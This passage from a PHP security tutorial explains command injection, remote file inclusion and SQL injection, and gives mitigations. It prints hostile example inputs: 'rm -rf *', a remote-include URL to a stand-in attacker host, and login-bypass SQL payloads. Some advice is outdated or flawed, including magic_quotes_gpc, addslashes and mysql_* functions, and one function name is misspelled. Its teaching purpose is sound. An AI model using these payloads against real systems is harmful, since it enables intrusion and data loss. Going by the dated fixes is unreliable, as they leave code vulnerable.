3.Issues with functions like exec() , system() and backticks:
A user input value to exec() function can make very bad results.
Like with system($input_from_user), user can enter any command as input and execute.
Even all the contents can be deleted by just giving “rm -rf *“.
Also in the exec() function user can enter any command by just using a semi-column (;) in the argument section.
Disable insecure functions using disable_functions in php.ini by disable_functions = system,exec
Use esacpesellcmd() – If allowing user to specify commands.
Use escapeshellarg() – If allowing user to specify arguments. It will put single quotes around the string. So it will escape any existing single quotes in the string.
4.Issues with Including Files:
Passing page path as a variable may get you in trouble.
The user can include a remote file which may contain malicious scripts. Hacker can also include other local files also.
If a php page include.php is like
$page = $_GET[‘path’];
Then, “include.php?path=http://hackingsite.com/hacking.php” will include the remote file hacking.php so that hacker can execute the hacking.php script in your server.
It can be disabled by setting allow_url_fopen = Off in php.ini.
Also set the open_basedir correctly in the php.ini.
Using open_basedir will restrict the file inclusion upto to the defined directory.
Also check the file name with a ‘switch’ or ‘if’ to make sure that it is an allowed one.
5. Issues with SQLInjection Attacks:
consider below script
$user = $_POST[‘username’];
$pass = $_POST[‘password’];
$result = mysql_query(“SELECT AcctNo FROM Users WHERE Username = ‘”.$user.”‘ and Password = ‘”.$pass.”‘”);
if user has entered a username as
‘ OR 1=1 #
and password as
Then query will be
“SELECT AcctNo FROM Users WHERE Username = ” OR 1=1 #’ and Password = ‘XXXX'”
Mysql consider all after the # as comments so it will ignore it.
With the remaining query it will always select all the account numbers and will return it so the user can get the account numbers even though he does not have any correct username and pasword.
Also giving password: as some_value like ‘ OR ‘X’ = ‘X will also bypass this query.
The problem here come from the ‘ (single quotes) entered by the user.
In order to disable it we have two ways.
First is the function addslashes(). It will add a /(slash) before all ‘ (quotes) so it will be have no effect.
So before executing the query you should pass it mysql_real_escape_string()function. That is, it should be like
$user = mysql_real_escape_string($_POST[‘username’]);
$pass = mysql_real_escape_string($_POST[‘password’]);
Another option is using the magic_quotes_gpc . You can set its value as ‘On’ in the php.ini .
If it is On then it will add a backslash before all single quotes and double quotes in the string comming from a HTML form. So we can escape it.
OR use the prepared statements.